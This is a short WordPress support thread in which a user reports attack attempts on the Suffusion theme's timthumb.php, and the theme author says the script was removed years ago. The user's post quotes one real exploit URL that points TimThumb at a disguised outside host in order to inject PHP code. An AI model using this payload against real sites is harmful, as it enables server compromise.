Title: Security Issue : timthumb.php
Last modified: August 20, 2016

---

# Security Issue : timthumb.php

 *  [ltoinel](https://wordpress.org/support/users/ltoinel/)
 * (@ltoinel)
 * [13 years, 5 months ago](https://wordpress.org/support/topic/security-issue-timthumbphp/)
 * Hi, I don’t use Wordress, however I received some attack in destination of the
   suffusion theme :
 * [http://xxxxxxxx/wp-content/themes/suffusion/timthumb.php?src=http://img.youtube.com.merkezefendi.gov.tr/cilik.php](http://xxxxxxxx/wp-content/themes/suffusion/timthumb.php?src=http://img.youtube.com.merkezefendi.gov.tr/cilik.php)
 * The attacker seems to use a fake host to inject malicious php code.
 * Cheers !

Viewing 1 replies (of 1 total)

 *  Theme Author [Sayontan Sinha](https://wordpress.org/support/users/sayontan/)
 * (@sayontan)
 * [13 years, 5 months ago](https://wordpress.org/support/topic/security-issue-timthumbphp/#post-3315588)
 * Suffusion doesn’t have TimThumb. You can verify the source code from the official
   WP repository: [http://themes.svn.wordpress.org/suffusion/4.4.4/](http://themes.svn.wordpress.org/suffusion/4.4.4/).
   The last version of Suffusion to have TimThumb was 3.7.1, which was almost 2 
   years back. In fact I took TimThumb out of Suffusion _6 months before_ the TimThumb
   vulnerability was discovered.
 * Attackers _try_ thousands of random strings in the hopes of injecting malicious
   code, but rest assured that TimThumb is not a part of the Suffusion code. Moreover,
   every theme distributed through [http://wordpress.org/extend/themes/](http://wordpress.org/extend/themes/)
   goes through a review, and TimThumb is not allowed in your code. So there is 
   no theme on this site that has TimThumb in it.

Viewing 1 replies (of 1 total)

The topic ‘Security Issue : timthumb.php’ is closed to new replies.

 * ![](https://i0.wp.com/themes.svn.wordpress.org/suffusion/4.4.9/screenshot.png)
 * Suffusion
 * [Support Threads](https://wordpress.org/support/theme/suffusion/)
 * [Active Topics](https://wordpress.org/support/theme/suffusion/active/)
 * [Unresolved Topics](https://wordpress.org/support/theme/suffusion/unresolved/)
 * [Reviews](https://wordpress.org/support/theme/suffusion/reviews/)

 * 1 reply
 * 2 participants
 * Last reply from: [Sayontan Sinha](https://wordpress.org/support/users/sayontan/)
 * Last activity: [13 years, 5 months ago](https://wordpress.org/support/topic/security-issue-timthumbphp/#post-3315588)
 * Status: not a support question